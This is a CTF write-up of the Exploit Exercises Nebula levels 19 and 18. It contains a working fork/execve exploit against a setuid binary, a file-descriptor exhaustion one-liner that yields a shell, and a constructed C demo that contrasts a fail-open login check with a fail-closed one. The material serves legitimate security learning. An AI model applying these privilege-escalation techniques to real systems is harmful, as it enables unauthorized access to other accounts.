Exploit Exercises Nebula — level19

This level is somewhat broken on the exploit-exercises site. However, a sharp reader can notice this.

After an initial reading, we can quickly conclude that fork() is the key to this challenge.

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    pid_t pid;

    /* If you're curious why we have /bin/sh here, goto man execve */
    char *arg[] = { "/bin/sh", "/tmp/pwn.sh", NULL };

    pid = fork();
    if (pid == 0)
        /* Child: replace this process image with flag19 */
        execve("/home/flag19/flag19", arg, NULL);

    /* Parent: return immediately, without waiting for the child */
    return 0;
}

Which results in:

level19@nebula:/home/flag19$ /tmp/pawn
level19@nebula:/home/flag19$ You have successfully executed getflag on a target account

(The funny-looking output is due to fork().)

This and man execve should be sufficient to explain what’s going on here.

Exploit Exercises Nebula — level18

After an initial reading I found all three ways and went for jamming up file descriptors.

level18@nebula:/home/flag18$ python -c 'print "login\n"*1021 + "closelog\n" + "shell"' > /tmp/input
level18@nebula:/home/flag18$ cat /tmp/input | /home/flag18/flag18 --rcfile -d log
/home/flag18/flag18: invalid option -- '-'
/home/flag18/flag18: invalid option -- 'r'
/home/flag18/flag18: invalid option -- 'c'
/home/flag18/flag18: invalid option -- 'f'
/home/flag18/flag18: invalid option -- 'i'
/home/flag18/flag18: invalid option -- 'l'
/home/flag18/flag18: invalid option -- 'e'
You have successfully executed getflag on a target account

Oh, btw, strace is your friend.
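
Jamming file descriptors only pays off against a check that fails open. The C below is an added example, not the flag18 source or code from the original post: it assumes a login routine that leaks a descriptor on every rejected attempt and skips the check when fopen() fails, and sets it beside a fail-closed version. The function names, the temporary password file and the limit of 32 are constructed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>

/* Vulnerable (constructed): a reject leaks fp; a failed fopen() skips the check. */
int login_fail_open(const char *pwfile, const char *pw)
{
    char line[64];
    FILE *fp = fopen(pwfile, "r");
    if (fp) {
        if (!fgets(line, sizeof line, fp) || strcmp(line, pw) != 0)
            return 0;               /* rejected, fp never closed */
        fclose(fp);
    }
    return 1;                       /* also reached when fp == NULL */
}

/* Hardened: no file or no match means deny, and fp is always closed. */
int login_fail_closed(const char *pwfile, const char *pw)
{
    char line[64];
    FILE *fp = fopen(pwfile, "r");
    if (!fp)
        return 0;                   /* cannot verify, so deny */
    int ok = fgets(line, sizeof line, fp) && strcmp(line, pw) == 0;
    fclose(fp);
    return ok;
}

/* Caps the soft fd limit at `cap`; returns how many wrong passwords the fail-open
 * version rejects before accepting one. *closed = hardened verdict in that state. */
int rejections_before_bypass(int cap, int *closed)
{
    char path[] = "/tmp/pwdemoXXXXXX";      /* constructed password file */
    struct rlimit old, low;
    int n = 0, fd = mkstemp(path);
    if (fd < 0 || write(fd, "s3cret", 6) != 6 || getrlimit(RLIMIT_NOFILE, &old))
        return -1;
    close(fd);
    low = old;
    low.rlim_cur = (rlim_t)cap;             /* small cap keeps the demo fast */
    setrlimit(RLIMIT_NOFILE, &low);
    while (n < 2 * cap && !login_fail_open(path, "wrong"))
        n++;
    *closed = login_fail_closed(path, "wrong");
    setrlimit(RLIMIT_NOFILE, &old);
    unlink(path);
    return n;
}
```

With descriptors 0 to 2 open and a cap of 32, the fail-open version rejects 29 wrong passwords and accepts the next one, while the fail-closed version still denies.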